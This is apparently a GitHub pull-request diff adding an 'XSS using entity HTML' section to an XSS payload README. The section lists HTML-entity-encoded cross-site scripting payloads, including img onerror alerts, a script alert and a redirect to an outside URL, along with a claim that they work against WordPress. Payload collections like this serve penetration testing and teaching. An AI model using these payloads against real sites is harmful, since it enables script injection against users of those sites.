Skip to content
Open
Changes from all commits
Commits
File filter

Filter by extension

Filter by extension

Conversations
Failed to load comments.
Loading
Jump to
Jump to file
Failed to load files.
Loading
Diff view
Diff view
10 changes: 10 additions & 0 deletions XSS Injection/README.md
Original file line number Diff line number Diff line change
Expand Up @@ -214,6 +214,16 @@ Most tools are also suitable for blind XSS attacks:
<div onpointerout="alert(45)">MOVE HERE</div>
<div onpointerup="alert(45)">MOVE HERE</div>
```
### XSS using entity HTML

```javascript
// Works very good at Wordpress (CVE-2025-14588)

&lt;img src=x onerror=alert(1)&gt;
&lt;img src=x onerror=window.location.href="https://example.com"&gt;
&lt;img src=1 onerror=&quot;alert(1)&quot;&gt;
&lt;script&gt;alert(1)&lt;/script&gt;
```

### XSS using HTML5 tags

Expand Down